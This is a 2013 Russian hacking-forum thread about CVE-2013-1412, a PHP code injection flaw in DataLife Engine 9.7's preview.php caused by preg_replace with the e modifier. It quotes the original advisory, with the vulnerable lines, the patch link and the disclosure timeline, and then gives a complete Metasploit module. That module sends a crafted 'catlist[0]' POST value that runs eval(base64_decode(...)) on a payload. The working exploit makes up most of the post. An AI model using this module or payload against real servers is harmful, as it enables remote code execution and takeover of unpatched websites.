1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability Read more: http:/

Тема в разделе "Уязвимости популярных CMS", создана пользователем Хулиган, 5 фев 2013.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Код:
    ------------------------------------------------------------------
    DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability
    ------------------------------------------------------------------
     
    [-] Software Link:
     
    http://dleviet.com/
     
     
    [-] Affected Version:
     
    9.7 only.
     
     
    [-] Vulnerability Description:
     
    The vulnerable code is located in the /engine/preview.php script:
     
    246.    $c_list = implode (',', $_REQUEST['catlist']);
    247.
    248.    if( strpos( $tpl->copy_template, "[catlist=" ) !== false ) {
    249.        $tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template );
    250.    }
    251.       
    252.    if( strpos( $tpl->copy_template, "[not-catlist=" ) !== false ) {
    253.        $tpl->copy_template = preg_replace( "#\\[not-catlist=(.+?)\\](.*?)\\[/not-catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}', false)", $tpl->copy_template );
    254.    }
     
    User supplied input passed through the $_REQUEST['catlist'] parameter is not properly
    sanitized before being used in a preg_replace() call with the e modifier at lines 249 and 253.
    This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of
    this vulnerability requires a template which contains a “catlist” (or a “not-catlist”) tag.
     
     
    [-] Solution:
     
    Apply the vendor patch: http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html
     
     
    [-] Disclosure Timeline:
     
    [16/01/2013] - Vendor notified
    [19/01/2013] - Vendor patch released
    [20/01/2013] - CVE number requested
    [21/01/2013] - CVE number assigned
    [28/01/2013] - Public disclosure
     
     
    [-] CVE Reference:
     
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2013-1412 to this vulnerability.
     
     
    [-] Credits:
     
    Vulnerability discovered by Egidio Romano.
     
     
    [-] Original Advisory:
     
    http://karmainsecurity.com/KIS-2013-01
    
    Код:
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    #   http://metasploit.com/
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking
     
        include Msf::Exploit::Remote::HttpClient
     
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'DataLife Engine preview.php PHP Code Injection',
                'Description'    => %q{
                        This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
                    The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
                    with the e modifier, which allows to inject arbitrary php code, when the template
                    in use contains a [catlist] or [not-catlist] tag.
                },
                'Author'         =>
                    [
                        'EgiX', # Vulnerability discovery
                        'juan vazquez' # Metasploit module
                    ],
                'License'        => MSF_LICENSE,
                'References'     =>
                    [
                        [ 'CVE', '2013-1412' ],
                        [ 'BID', '57603' ],
                        [ 'EDB', '24438' ],
                        [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
                        [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
                    ],
                'Privileged'     => false,
                'Platform'       => ['php'],
                'Arch'           => ARCH_PHP,
                'Payload'        =>
                    {
                        'Keys'   => ['php']
                    },
                'DisclosureDate' => 'Jan 28 2013',
                'Targets'        => [ ['DataLife Engine 9.7', { }], ],
                'DefaultTarget'  => 0
                ))
     
            register_options(
                [
                    OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
                ], self.class)
        end
     
        def uri
            normalize_uri(target_uri.path, 'engine', 'preview.php')
        end
     
        def check
            fingerprint = rand_text_alpha(4+rand(4))
            res = send_request_cgi(
                {
                    'uri'       =>  uri,
                    'method'    => 'POST',
                    'vars_post' =>
                        {
                            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
                        }
                })
     
            if res and res.code == 200 and res.body =~ /#{fingerprint}/
                return Exploit::CheckCode::Vulnerable
            else
                return Exploit::CheckCode::Safe
            end
        end
     
        def exploit
            @peer = "#{rhost}:#{rport}"
     
            print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
            res = send_request_cgi(
                {
                    'uri'       =>  uri,
                    'method'    => 'POST',
                    'vars_post' =>
                        {
                            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
                        }
                })
        end
    end
    
     
    5 фев 2013
  2. chimchoca7
    chimchoca7 Новичок
    Симпатии:
    0
    обнаружения или
     
    26 авг 2013

Поделиться этой страницей

Загрузка...